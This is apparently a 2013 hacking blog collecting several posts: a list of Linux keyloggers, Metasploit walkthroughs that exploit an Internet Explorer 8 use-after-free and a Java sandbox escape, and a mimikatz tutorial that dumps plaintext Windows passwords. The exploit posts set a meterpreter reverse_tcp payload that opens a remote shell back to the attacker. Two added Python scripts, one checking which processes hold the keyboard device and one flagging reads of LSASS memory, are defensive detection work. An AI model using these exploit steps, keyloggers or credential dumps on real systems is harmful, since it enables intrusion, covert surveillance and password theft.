We are dealing with Best educated generation in world. but they have got brain dressed up nowhere to go

Monday, May 13, 2013

List of Linux Key loggers


List of Linux Key loggers :-

(1)LKL:-
LKL is a user-space keylogger that runs under Linux on x86. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60).

Download From here

(2)logkeys:-
logkeys is a Linux keylogger. It is no more advanced than other available Linux keyloggers, notably lkl and uberkey, but it is a bit newer and more up to date, it doesn't unreliably repeat keys, and it shouldn't crash your X. All in all, it just seems to work. It relies on the event interface of the Linux input subsystem.

Once completely set up, it logs all common character and function keys, while also being fully aware of the Shift and AltGr key modifiers.

Download from here

(3)ttyrpld:-
ttyrpld is a kit to log any traffic and actions that go through any of your kernel's tty devices. In plain terms, it is a keylogger.

Download from here

(4)uberkey:-
Download link

(5)Vlogger:-
Download link

(6)Simple keylogger Python script:-
Download here

If you have some time and want to learn how the keyboard driver works in the Linux kernel, I would recommend reading the following link.

Also read this article, which is quite interesting: http://theinvisiblethings.blogspot.in/2011/04/linux-security-circus-on-gui-isolation.html
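An added defender-side check, not from the post or from any of the tools listed above: it reads /proc/bus/input/devices to find which /dev/input/eventN node the kernel assigned to the keyboard, then lists the processes holding that node open, which is exactly what an event-interface keylogger like logkeys has to do. The /proc text, PIDs and paths embedded below are constructed samples.

```python
"""Find processes holding a keyboard event device open.

Keyloggers built on the Linux input subsystem (logkeys above) read the
keyboard's /dev/input/eventN; normally only the display server or console
daemon should hold it.  The /proc text and fd table below are constructed
samples so the logic runs without root."""
import os

SAMPLE_DEVICES = """\
N: Name="AT Translated Set 2 keyboard"
H: Handlers=sysrq kbd event1 leds

N: Name="PS/2 Generic Mouse"
H: Handlers=mouse0 event2
"""
SAMPLE_OPEN_FDS = {  # pid -> fd targets, as os.readlink(/proc/<pid>/fd/*) returns them
    1234: ["/dev/null", "/dev/input/event1"],  # unexpected keyboard holder
    999: ["/dev/input/event2"],                 # mouse only
}

def keyboard_event_nodes(devices_text):
    """/dev/input/eventN paths whose 'H: Handlers=' line lists kbd."""
    nodes = []
    for line in devices_text.splitlines():
        if line.startswith("H: Handlers="):
            handlers = line.split("=", 1)[1].split()
            if "kbd" in handlers:
                nodes += ["/dev/input/" + h for h in handlers if h.startswith("event")]
    return nodes

def holders(open_fds, keyboard_nodes):
    """PIDs whose fd table contains any of the keyboard nodes."""
    wanted = set(keyboard_nodes)
    return sorted(pid for pid, targets in open_fds.items() if wanted & set(targets))

def live_open_fds():
    """Walk /proc/*/fd (run as root to see every process)."""
    table = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            fds = os.listdir(f"/proc/{pid}/fd")
            table[int(pid)] = [os.readlink(f"/proc/{pid}/fd/{fd}") for fd in fds]
        except OSError:  # process exited or not readable
            continue
    return table

if __name__ == "__main__":
    with open("/proc/bus/input/devices") as f:
        nodes = keyboard_event_nodes(f.read())
    print("keyboard nodes:", nodes, "held by PIDs:", holders(live_open_fds(), nodes))
```

Run it as root on a live host and compare the PIDs against what you expect (Xorg, a Wayland compositor, or nothing at all on a server).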

Monday, May 6, 2013

Exploit 0Day vulnerability in Internet Explorer 8

Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed but a reference to it is kept on the Document and used again during rendering; controllable invalid memory is then used, which allows arbitrary code execution in the context of the user. Please note: this vulnerability was exploited in the wild in May 2013, in the compromise of the Department of Labor (DoL) website.

Exploit Targets

    0 - Automatic (default)
    1 - IE 8 on Windows XP SP3
    2 - IE 8 on Windows Vista
    3 - IE 8 on Windows Server 2003
    4 - IE 8 on Windows 7

msf > use exploit/windows/browser/ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > show payloads
msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_cgenericelement_uaf) > set LHOST [MY IP ADDRESS]
msf exploit(ie_cgenericelement_uaf) > exploit

Tuesday, April 30, 2013

Java Applet Reflection Type Confusion Remote Code Execution


This module abuses Java Reflection to generate a type confusion, due to weak access control when setting final fields on static classes, and runs code outside of the Java sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play through a specially crafted JNLP file. This bypass applies mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise the applet is launched without the click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

(1)msfconsole


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

Monday, April 15, 2013

How to solve the wpscan problem in BackTrack 5 R3?

WPScan is a WordPress security scanner that comes pre-installed in BackTrack 5, but it is an outdated version, so when you try to update it you may run into some problems. Here is the solution that worked for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb

Monday, March 25, 2013

Get Clear-Text Credentials on Windows


Today we are going to use a new tool that can be used to get Windows passwords in plain text. It works on both 32-bit and 64-bit OSes. We already know the NTLM password-cracking methods, but they are time-consuming, and sometimes we cannot get the password in plain text. But this tool is amazing; it works on the "Pass the pass" method.

In this tutorial we are going to use this tool on the local computer, but in the next one we will use it to get the passwords of a remote PC using Metasploit.

(1)Download the tool from here
(2)After extracting, open the win32 or x64 folder depending on your OS.
(3)Run mimikatz as Administrator.
(4)Now type privilege::debug ; this command checks whether mimikatz is running with system privilege
(5)In order to get the credentials in plain text, type this command: sekurlsa::logonPasswords full

(6)You can see the credentials in plain text.
Next we will use Metasploit to get the credentials of a remote PC.
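An added detection example, not part of the post or of mimikatz: it assumes Sysmon Event ID 10 (ProcessAccess) EventData records as input and flags any non-allowlisted process that opens lsass.exe with PROCESS_VM_READ, the access right that reading logon passwords out of LSASS memory requires. The event records, paths and allowlist below are constructed samples.

```python
"""Flag processes that open lsass.exe with memory-read access.

Pulling plaintext logon passwords out of LSASS (the post above) means
reading LSASS memory, so the access mask must include PROCESS_VM_READ.
Assumed input: Sysmon Event ID 10 (ProcessAccess) EventData XML; the
records below are constructed samples, not a real capture."""
import xml.etree.ElementTree as ET

PROCESS_VM_READ = 0x0010  # Win32 process access right needed to read memory
# Sources expected to touch LSASS on this hypothetical host; tune per site.
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

SAMPLE_EVENTS = [
    '<EventData><Data Name="SourceImage">C:\\Windows\\System32\\csrss.exe</Data>'
    '<Data Name="TargetImage">C:\\Windows\\System32\\lsass.exe</Data>'
    '<Data Name="GrantedAccess">0x1FFFFF</Data></EventData>',
    '<EventData><Data Name="SourceImage">C:\\Users\\bob\\Desktop\\x64\\mimikatz.exe</Data>'
    '<Data Name="TargetImage">C:\\Windows\\System32\\lsass.exe</Data>'
    '<Data Name="GrantedAccess">0x1010</Data></EventData>',
    '<EventData><Data Name="SourceImage">C:\\Windows\\System32\\taskmgr.exe</Data>'
    '<Data Name="TargetImage">C:\\Windows\\System32\\lsass.exe</Data>'
    '<Data Name="GrantedAccess">0x1000</Data></EventData>',
]

def parse_event(xml_text):
    """Return {Name: value} for the <Data> children of one EventData record."""
    return {d.get("Name"): (d.text or "") for d in ET.fromstring(xml_text).iter("Data")}

def is_lsass_read(event):
    """True when a non-allowlisted source opened lsass.exe with PROCESS_VM_READ."""
    source = event.get("SourceImage", "").lower()
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe") or source in ALLOWLIST:
        return False
    return bool(int(event.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ)

def suspicious_sources(xml_records):
    """Source images that read LSASS memory, in order of first appearance."""
    hits = []
    for record in xml_records:
        ev = parse_event(record)
        if is_lsass_read(ev) and ev["SourceImage"] not in hits:
            hits.append(ev["SourceImage"])
    return hits

if __name__ == "__main__":
    for image in suspicious_sources(SAMPLE_EVENTS):
        print("LSASS memory read by", image)
```

The third sample (0x1000, PROCESS_QUERY_LIMITED_INFORMATION) is what Task Manager style queries look like and is not flagged, which keeps the rule from paging on every process listing.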